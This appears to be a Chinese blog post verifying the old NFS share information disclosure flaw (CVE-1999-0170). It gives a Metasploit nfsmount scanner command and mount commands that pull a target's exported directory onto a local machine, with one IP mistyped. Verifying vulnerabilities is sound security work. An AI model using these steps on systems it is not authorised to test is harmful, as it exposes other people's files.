【漏洞验证】NFS 共享信息泄露漏洞

文章目录

描述

漏洞名称:NFS Exported Share Information Disclosure
中文名称:NFS 共享信息泄露漏洞
漏洞等级:高危
CVE:CVE-1999-0170
Nessus扫描结果
在这里插入图片描述
输出共享目录和文件信息
在这里插入图片描述

验证

步骤1:msf 验证漏洞是否存在,并输出共享目录

use auxiliary/scanner/nfs/nfsmount
set rhosts 192.168.1.1(IP为目标IP,端口默认设置为111不改动)

在这里插入图片描述
步骤2:

mkdir /tmp/test                                           //新建目录
mount -t nfs 192..168.1.1:/web/uploads /tmp/test          //将目标IP的目录挂载到本地新建的目录下 
df -k                                                     //查看挂载情况
ls /tmp/test                                              //查看已经共享过来的文件

在这里插入图片描述
这时候已经得到目标机共享目录下的所有文件。

评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值